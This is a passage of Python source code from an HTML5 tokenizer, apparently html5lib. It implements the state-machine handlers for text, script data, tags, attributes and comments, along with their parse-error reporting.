# of ¬i for instance.
try:
entityName = entitiesTrie.longest_prefix("".join(charStack[:-1]))
entityLength = len(entityName)
except KeyError:
entityName = None
if entityName is not None:
if entityName[-1] != ";":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"named-entity-without-semicolon"})
if (entityName[-1] != ";" and fromAttribute and
(charStack[entityLength] in asciiLetters or
charStack[entityLength] in digits or
charStack[entityLength] == "=")):
self.stream.unget(charStack.pop())
output = "&" + "".join(charStack)
else:
output = entities[entityName]
self.stream.unget(charStack.pop())
output += "".join(charStack[entityLength:])
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-named-entity"})
self.stream.unget(charStack.pop())
output = "&" + "".join(charStack)
if fromAttribute:
self.currentToken["data"][-1][1] += output
else:
if output in spaceCharacters:
tokenType = "SpaceCharacters"
else:
tokenType = "Characters"
self.tokenQueue.append({"type": tokenTypes[tokenType], "data": output})
def processEntityInAttribute(self, allowedChar):
"""This method replaces the need for "entityInAttributeValueState".
"""
self.consumeEntity(allowedChar=allowedChar, fromAttribute=True)
def emitCurrentToken(self):
"""This method is a generic handler for emitting the tags. It also sets
the state to "data" because that's what's needed after a token has been
emitted.
"""
token = self.currentToken
# Add token to the queue to be yielded
if (token["type"] in tagTokenTypes):
if self.lowercaseElementName:
token["name"] = token["name"].translate(asciiUpper2Lower)
if token["type"] == tokenTypes["EndTag"]:
if token["data"]:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "attributes-in-end-tag"})
if token["selfClosing"]:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "self-closing-flag-on-end-tag"})
self.tokenQueue.append(token)
self.state = self.dataState
# Below are the various tokenizer states worked out.
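    # Each *State method below follows the same protocol: it consumes characters
    # from self.stream, may append tokens (including ParseError tokens) to
    # self.tokenQueue, switches self.state to the next handler, and returns True;
    # the data-like states return False once EOF is reached, which ends
    # tokenization (see dataState).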
def dataState(self):
data = self.stream.char()
if data == "&":
self.state = self.entityDataState
elif data == "<":
self.state = self.tagOpenState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\u0000"})
elif data is EOF:
# Tokenization ends.
return False
elif data in spaceCharacters:
# Directly after emitting a token you switch back to the "data
# state". At that point spaceCharacters are important so they are
# emitted separately.
self.tokenQueue.append({"type": tokenTypes["SpaceCharacters"], "data":
data + self.stream.charsUntil(spaceCharacters, True)})
# No need to update lastFourChars here, since the first space will
# have already been appended to lastFourChars and will have broken
# any <!-- or --> sequences
else:
chars = self.stream.charsUntil(("&", "<", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def entityDataState(self):
self.consumeEntity()
self.state = self.dataState
return True
def rcdataState(self):
data = self.stream.char()
if data == "&":
self.state = self.characterReferenceInRcdata
elif data == "<":
self.state = self.rcdataLessThanSignState
elif data == EOF:
# Tokenization ends.
return False
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data in spaceCharacters:
# Directly after emitting a token you switch back to the "data
# state". At that point spaceCharacters are important so they are
# emitted separately.
self.tokenQueue.append({"type": tokenTypes["SpaceCharacters"], "data":
data + self.stream.charsUntil(spaceCharacters, True)})
# No need to update lastFourChars here, since the first space will
# have already been appended to lastFourChars and will have broken
# any <!-- or --> sequences
else:
chars = self.stream.charsUntil(("&", "<", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def characterReferenceInRcdata(self):
self.consumeEntity()
self.state = self.rcdataState
return True
def rawtextState(self):
data = self.stream.char()
if data == "<":
self.state = self.rawtextLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data == EOF:
# Tokenization ends.
return False
else:
chars = self.stream.charsUntil(("<", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def scriptDataState(self):
data = self.stream.char()
if data == "<":
self.state = self.scriptDataLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data == EOF:
# Tokenization ends.
return False
else:
chars = self.stream.charsUntil(("<", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def plaintextState(self):
data = self.stream.char()
if data == EOF:
# Tokenization ends.
return False
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + self.stream.charsUntil("\u0000")})
return True
def tagOpenState(self):
data = self.stream.char()
if data == "!":
self.state = self.markupDeclarationOpenState
elif data == "/":
self.state = self.closeTagOpenState
elif data in asciiLetters:
self.currentToken = {"type": tokenTypes["StartTag"],
"name": data, "data": [],
"selfClosing": False,
"selfClosingAcknowledged": False}
self.state = self.tagNameState
elif data == ">":
# XXX In theory it could be something besides a tag name. But
# do we really care?
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-tag-name-but-got-right-bracket"})
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<>"})
self.state = self.dataState
elif data == "?":
# XXX In theory it could be something besides a tag name. But
# do we really care?
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-tag-name-but-got-question-mark"})
self.stream.unget(data)
self.state = self.bogusCommentState
else:
# XXX
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-tag-name"})
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.dataState
return True
def closeTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.currentToken = {"type": tokenTypes["EndTag"], "name": data,
"data": [], "selfClosing": False}
self.state = self.tagNameState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-closing-tag-but-got-right-bracket"})
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-closing-tag-but-got-eof"})
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.state = self.dataState
else:
# XXX data can be _'_...
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-closing-tag-but-got-char",
"datavars": {"data": data}})
self.stream.unget(data)
self.state = self.bogusCommentState
return True
def tagNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == ">":
self.emitCurrentToken()
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-tag-name"})
self.state = self.dataState
elif data == "/":
self.state = self.selfClosingStartTagState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["name"] += "\uFFFD"
else:
self.currentToken["name"] += data
# (Don't use charsUntil here, because tag names are
# very short and it's faster to not do anything fancy)
return True
def rcdataLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.temporaryBuffer = ""
self.state = self.rcdataEndTagOpenState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rcdataEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.rcdataEndTagNameState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rcdataEndTagNameState(self):
appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.beforeAttributeNameState
elif data == "/" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.selfClosingStartTagState
elif data == ">" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "</" + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rawtextLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.temporaryBuffer = ""
self.state = self.rawtextEndTagOpenState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.rawtextState
return True
def rawtextEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.rawtextEndTagNameState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.stream.unget(data)
self.state = self.rawtextState
return True
def rawtextEndTagNameState(self):
appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.beforeAttributeNameState
elif data == "/" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.selfClosingStartTagState
elif data == ">" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "</" + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.rawtextState
return True
def scriptDataLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.temporaryBuffer = ""
self.state = self.scriptDataEndTagOpenState
elif data == "!":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<!"})
self.state = self.scriptDataEscapeStartState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.scriptDataEndTagNameState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEndTagNameState(self):
appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.beforeAttributeNameState
elif data == "/" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.selfClosingStartTagState
elif data == ">" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "</" + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapeStartState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataEscapeStartDashState
else:
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapeStartDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataEscapedDashDashState
else:
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapedState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataEscapedDashState
elif data == "<":
self.state = self.scriptDataEscapedLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data == EOF:
self.state = self.dataState
else:
chars = self.stream.charsUntil(("<", "-", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def scriptDataEscapedDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataEscapedDashDashState
elif data == "<":
self.state = self.scriptDataEscapedLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
self.state = self.scriptDataEscapedState
elif data == EOF:
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedDashDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
elif data == "<":
self.state = self.scriptDataEscapedLessThanSignState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": ">"})
self.state = self.scriptDataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
self.state = self.scriptDataEscapedState
elif data == EOF:
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.temporaryBuffer = ""
self.state = self.scriptDataEscapedEndTagOpenState
elif data in asciiLetters:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<" + data})
self.temporaryBuffer = data
self.state = self.scriptDataDoubleEscapeStartState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer = data
self.state = self.scriptDataEscapedEndTagNameState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedEndTagNameState(self):
appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.beforeAttributeNameState
elif data == "/" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.selfClosingStartTagState
elif data == ">" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "</" + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataDoubleEscapeStartState(self):
data = self.stream.char()
if data in (spaceCharacters | frozenset(("/", ">"))):
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
if self.temporaryBuffer.lower() == "script":
self.state = self.scriptDataDoubleEscapedState
else:
self.state = self.scriptDataEscapedState
elif data in asciiLetters:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.temporaryBuffer += data
else:
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataDoubleEscapedState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataDoubleEscapedDashState
elif data == "<":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data == EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-script-in-script"})
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
return True
def scriptDataDoubleEscapedDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataDoubleEscapedDashDashState
elif data == "<":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
self.state = self.scriptDataDoubleEscapedState
elif data == EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-script-in-script"})
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapedDashDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
elif data == "<":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": ">"})
self.state = self.scriptDataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
self.state = self.scriptDataDoubleEscapedState
elif data == EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-script-in-script"})
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapedLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "/"})
self.temporaryBuffer = ""
self.state = self.scriptDataDoubleEscapeEndState
else:
self.stream.unget(data)
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapeEndState(self):
data = self.stream.char()
if data in (spaceCharacters | frozenset(("/", ">"))):
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
if self.temporaryBuffer.lower() == "script":
self.state = self.scriptDataEscapedState
else:
self.state = self.scriptDataDoubleEscapedState
elif data in asciiLetters:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.temporaryBuffer += data
else:
self.stream.unget(data)
self.state = self.scriptDataDoubleEscapedState
return True
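    # Note on the script-data "escaped" / "double escaped" states above:
    # they implement the HTML5 rules for <script> content that contains
    # HTML comment markers.  A hedged illustration (not from the original
    # source): for input like
    #     <script><!--<script>x</script>--></script>
    # the tokenizer enters the escaped states at "<!--", switches to the
    # double-escaped states at the inner "<script>", and only leaves
    # script data at the final "</script>"; everything in between is
    # emitted as Characters tokens.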
def beforeAttributeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data in asciiLetters:
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
elif data == ">":
self.emitCurrentToken()
elif data == "/":
self.state = self.selfClosingStartTagState
elif data in ("'", '"', "=", "<"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"invalid-character-in-attribute-name"})
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"].append(["\uFFFD", ""])
self.state = self.attributeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-attribute-name-but-got-eof"})
self.state = self.dataState
else:
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
return True
def attributeNameState(self):
data = self.stream.char()
leavingThisState = True
emitToken = False
if data == "=":
self.state = self.beforeAttributeValueState
elif data in asciiLetters:
self.currentToken["data"][-1][0] += data +\
self.stream.charsUntil(asciiLetters, True)
leavingThisState = False
elif data == ">":
            # XXX If we emit here, the attributes are converted to a dict
            # without being checked, and when the code below runs we error
            # because data is a dict, not a list
emitToken = True
elif data in spaceCharacters:
self.state = self.afterAttributeNameState
elif data == "/":
self.state = self.selfClosingStartTagState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][0] += "\uFFFD"
leavingThisState = False
elif data in ("'", '"', "<"):
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data":
"invalid-character-in-attribute-name"})
self.currentToken["data"][-1][0] += data
leavingThisState = False
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "eof-in-attribute-name"})
self.state = self.dataState
else:
self.currentToken["data"][-1][0] += data
leavingThisState = False
if leavingThisState:
# Attributes are not dropped at this stage. That happens when the
# start tag token is emitted so values can still be safely appended
# to attributes, but we do want to report the parse error in time.
if self.lowercaseAttrName:
self.currentToken["data"][-1][0] = (
self.currentToken["data"][-1][0].translate(asciiUpper2Lower))
for name, value in self.currentToken["data"][:-1]:
if self.currentToken["data"][-1][0] == name:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"duplicate-attribute"})
break
# XXX Fix for above XXX
if emitToken:
self.emitCurrentToken()
return True
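    # The attribute-name handling above batches character runs with
    # charsUntil() and defers lowercasing and duplicate detection until
    # the tokenizer leaves the state.  Hedged example (not from the
    # original source): for
    #     <p id="a" ID="b">
    # the second attribute produces a "duplicate-attribute" parse error
    # here, but the attribute itself is only dropped later, when the
    # start tag token is emitted.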
def afterAttributeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data == "=":
self.state = self.beforeAttributeValueState
elif data == ">":
self.emitCurrentToken()
elif data in asciiLetters:
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
elif data == "/":
self.state = self.selfClosingStartTagState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"].append(["\uFFFD", ""])
self.state = self.attributeNameState
elif data in ("'", '"', "<"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"invalid-character-after-attribute-name"})
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-end-of-tag-but-got-eof"})
self.state = self.dataState
else:
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
return True
def beforeAttributeValueState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data == "\"":
self.state = self.attributeValueDoubleQuotedState
elif data == "&":
self.state = self.attributeValueUnQuotedState
self.stream.unget(data)
elif data == "'":
self.state = self.attributeValueSingleQuotedState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-attribute-value-but-got-right-bracket"})
self.emitCurrentToken()
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][1] += "\uFFFD"
self.state = self.attributeValueUnQuotedState
elif data in ("=", "<", "`"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"equals-in-unquoted-attribute-value"})
self.currentToken["data"][-1][1] += data
self.state = self.attributeValueUnQuotedState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-attribute-value-but-got-eof"})
self.state = self.dataState
else:
self.currentToken["data"][-1][1] += data
self.state = self.attributeValueUnQuotedState
return True
def attributeValueDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterAttributeValueState
elif data == "&":
self.processEntityInAttribute('"')
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][1] += "\uFFFD"
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-attribute-value-double-quote"})
self.state = self.dataState
else:
self.currentToken["data"][-1][1] += data +\
self.stream.charsUntil(("\"", "&", "\u0000"))
return True
def attributeValueSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterAttributeValueState
elif data == "&":
self.processEntityInAttribute("'")
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][1] += "\uFFFD"
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-attribute-value-single-quote"})
self.state = self.dataState
else:
self.currentToken["data"][-1][1] += data +\
self.stream.charsUntil(("'", "&", "\u0000"))
return True
def attributeValueUnQuotedState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == "&":
self.processEntityInAttribute(">")
elif data == ">":
self.emitCurrentToken()
elif data in ('"', "'", "=", "<", "`"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-character-in-unquoted-attribute-value"})
self.currentToken["data"][-1][1] += data
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][1] += "\uFFFD"
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-attribute-value-no-quotes"})
self.state = self.dataState
else:
self.currentToken["data"][-1][1] += data + self.stream.charsUntil(
frozenset(("&", ">", '"', "'", "=", "<", "`", "\u0000")) | spaceCharacters)
return True
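    # Hedged sketch of unquoted attribute values (not from the original
    # source): for input such as
    #     <input value=a&amp;b>
    # the "&" branch resolves the entity via processEntityInAttribute(">")
    # and the final branch's charsUntil() batches the remaining ordinary
    # characters, so the attribute value ends up as "a&b" without one
    # state transition per character.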
def afterAttributeValueState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == ">":
self.emitCurrentToken()
elif data == "/":
self.state = self.selfClosingStartTagState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-EOF-after-attribute-value"})
self.stream.unget(data)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-character-after-attribute-value"})
self.stream.unget(data)
self.state = self.beforeAttributeNameState
return True
def selfClosingStartTagState(self):
data = self.stream.char()
if data == ">":
self.currentToken["selfClosing"] = True
self.emitCurrentToken()
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data":
"unexpected-EOF-after-solidus-in-tag"})
self.stream.unget(data)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-character-after-solidus-in-tag"})
self.stream.unget(data)
self.state = self.beforeAttributeNameState
return True
def bogusCommentState(self):
# Make a new comment token and give it as value all the characters
# until the first > or EOF (charsUntil checks for EOF automatically)
# and emit it.
data = self.stream.charsUntil(">")
data = data.replace("\u0000", "\uFFFD")
self.tokenQueue.append(
{"type": tokenTypes["Comment"], "data": data})
# Eat the character directly after the bogus comment which is either a
# ">" or an EOF.
self.stream.char()
self.state = self.dataState
return True
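    # bogusCommentState is reached for malformed markup such as "<?...>"
    # or "<!x...>".  Rough example (assumption): "<?xml version='1.0'?>"
    # becomes a single Comment token whose data is "?xml version='1.0'?",
    # and the terminating ">" is consumed by the trailing stream.char().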
def markupDeclarationOpenState(self):
charStack = [self.stream.char()]
if charStack[-1] == "-":
charStack.append(self.stream.char())
if charStack[-1] == "-":
self.currentToken = {"type": tokenTypes["Comment"], "data": ""}
self.state = self.commentStartState
return True
elif charStack[-1] in ('d', 'D'):
matched = True
for expected in (('o', 'O'), ('c', 'C'), ('t', 'T'),
('y', 'Y'), ('p', 'P'), ('e', 'E')):
charStack.append(self.stream.char())
if charStack[-1] not in expected:
matched = False
break
if matched:
self.currentToken = {"type": tokenTypes["Doctype"],
"name": "",
"publicId": None, "systemId": None,
"correct": True}
self.state = self.doctypeState
return True
elif (charStack[-1] == "[" and
self.parser is not None and
self.parser.tree.openElements and
self.parser.tree.openElements[-1].namespace != self.parser.tree.defaultNamespace):
matched = True
for expected in ["C", "D", "A", "T", "A", "["]:
charStack.append(self.stream.char())
if charStack[-1] != expected:
matched = False
break
if matched:
self.state = self.cdataSectionState
return True
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-dashes-or-doctype"})
while charStack:
self.stream.unget(charStack.pop())
self.state = self.bogusCommentState
return True
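    # markupDeclarationOpenState dispatches on what follows "<!":
    # "--" opens a comment, a case-insensitive "DOCTYPE" opens a doctype,
    # and "[CDATA[" is only honoured while the current open element is in
    # a foreign (non-default) namespace; anything else is pushed back
    # character by character and re-parsed as a bogus comment.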
def commentStartState(self):
data = self.stream.char()
if data == "-":
self.state = self.commentStartDashState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"incorrect-comment"})
self.tokenQueue.append(self.currentToken)
